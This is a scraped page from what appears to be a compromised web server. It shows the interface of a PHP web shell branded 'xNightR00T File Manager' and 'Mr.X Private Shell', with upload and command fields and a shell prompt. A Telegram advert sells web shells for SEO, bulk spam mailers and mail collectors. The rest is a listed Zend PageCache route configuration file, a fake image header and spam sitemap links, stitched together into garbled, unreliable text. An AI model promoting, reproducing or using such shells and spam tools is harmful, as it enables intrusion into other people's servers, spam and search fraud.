xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php
use Zend\Router\Http\Literal;
return array(
    'view_helpers' => array(
        'invokables' => array(
            'responseRuleXml' => 'PageCache\View\Helper\ResponseRuleXml',
            'responseRuleJson' => 'PageCache\View\Helper\ResponseRuleJson',
            'cacheRuleXml' => 'PageCache\View\Helper\RuleXml',
            'cacheRuleJson' => 'PageCache\View\Helper\RuleJson',
            'cacheRuleDataXml' => 'PageCache\View\Helper\RuleDataXml',
            'cacheRuleDataJson' => 'PageCache\View\Helper\RuleDataJson',
        )
    ),
    'controllers' => array(
        'invokables' => array(
            'PageCache'             => 'PageCache\Controller\IndexController',
            'PageCacheEditRule'     => 'PageCache\Controller\EditController',
            'PageCacheWebApi-1_3'   => 'PageCache\Controller\WebAPI13Controller',
            'PageCacheWebApi-1_4'   => 'PageCache\Controller\WebAPIController',
            'PageCacheWebApi-1_15'  => 'PageCache\Controller\WebAPI115Controller',
            'PageCacheWebApi-1_16'  => 'PageCache\Controller\WebAPI116Controller',
        ),
    ),
    'view_manager' => array(
        'template_path_stack' => array(
            __DIR__.'/../views',
        ),
    ),
    'webapi_routes' => array(
        'pagecacheRulesList' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/pagecacheRulesList',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pagecacheRulesList',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'pagecacheDeleteRules' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/pagecacheDeleteRules',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pagecacheDeleteRules',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'pagecacheUpdateRulePriority' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/pagecacheUpdateRulePriority',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pagecacheUpdateRulePriority',
                    'versions' => array('1.15')
                ),
            ),
        ),
        'pagecacheClearRulesCache' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/pagecacheClearRulesCache',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pagecacheClearRulesCache',
                    'versions' => array('1.4')
                ),
            ),
        ),
        'pagecacheRuleInfo' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/pagecacheRuleInfo',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pagecacheRuleInfo',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'pagecacheSaveRule' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/pagecacheSaveRule',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pagecacheSaveRule',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'pagecacheSaveResponseRule' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/pagecacheSaveResponseRule',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pagecacheSaveResponseRule',
                    'versions' => array('1.16')
                ),
            ),
        ),
        'pagecacheResponseRulesList' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/pagecacheResponseRulesList',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pagecacheResponseRulesList',
                    'versions' => array('1.16')
                ),
            ),
        ),
        'pagecacheSaveApplicationRule' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/pagecacheSaveApplicationRule',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pagecacheSaveApplicationRule',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'pagecacheDeleteRulesByApplicationId' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/pagecacheDeleteRulesByApplicationId',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pagecacheDeleteRulesByApplicationId',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'pagecacheClearCacheByRuleName' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/pagecacheClearCacheByRuleName',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pagecacheClearCacheByRuleName',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'pagecacheExportRules' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/pagecacheExportRules',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pagecacheExportRules',
                    'versions' => array('1.3'),
                    'output' => array('xml')
                ),
            ),
        ),
        'pagecacheImportRules' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/pagecacheImportRules',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pagecacheImportRules',
                    'versions' => array('1.3')
                ),
            ),
        ),
        'pageCachePulseStatistics' => array('type' => Literal::class,
            'options' => array(
                'route' => '/Api/pageCachePulseStatistics',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pageCachePulseStatistics',
                    'versions' => array('1.15')
                ),
            ),
        ),
        'clearPageCacheStatistics' => array('type' => Literal::class,
            'options' => array(
                'route' => '/Api/clearPageCacheStatistics',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'clearPageCacheStatistics',
                    'versions' => array('1.15')
                ),
            ),
        ),
        'pageCacheRuleEnableDisable' => array('type' => Literal::class,
            'options' => array(
                'route' => '/Api/pageCacheRuleEnableDisable',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pageCacheRuleEnableDisable',
                    'versions' => array('1.15')
                ),
            ),
        ),
        'pageCachePulseStatus' => array('type' => Literal::class,
            'options' => array(
                'route' => '/Api/pageCachePulseStatus',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pageCachePulseStatus',
                    'versions' => array('1.15')
                ),
            ),
        ),
        'pageCachePulseExecutions' => array('type' => Literal::class,
            'options' => array(
                'route' => '/Api/pageCachePulseExecutions',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pageCachePulseExecutions',
                    'versions' => array('1.15')
                ),
            ),
        ),
        'pageCachePulseGetRuleNames' => array('type' => Literal::class,
            'options' => array(
                'route' => '/Api/pageCachePulseGetRuleNames',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pageCachePulseGetRuleNames',
                    'versions' => array('1.15')
                ),
            ),
        ),
        'pageCachePulseMetadata' => array('type' => Literal::class,
            'options' => array(
                'route' => '/Api/pageCachePulseMetadata',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pageCachePulseMetadata',
                    'versions' => array('1.15')
                ),
            ),),
        'pageCacheCollectTask' => array('type' => Literal::class,
            'options' => array(
                'route' => '/Api/pageCacheCollectTask',
                'defaults' => array(
                    'controller' => 'PageCacheWebApi',
                    'action' => 'pageCacheCollectTask',
                    'versions' => array('1.15')
                ),
            ),),
        
    ),
);

Filemanager

Name Type Size Permission Actions
module.config.php File 9.74 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml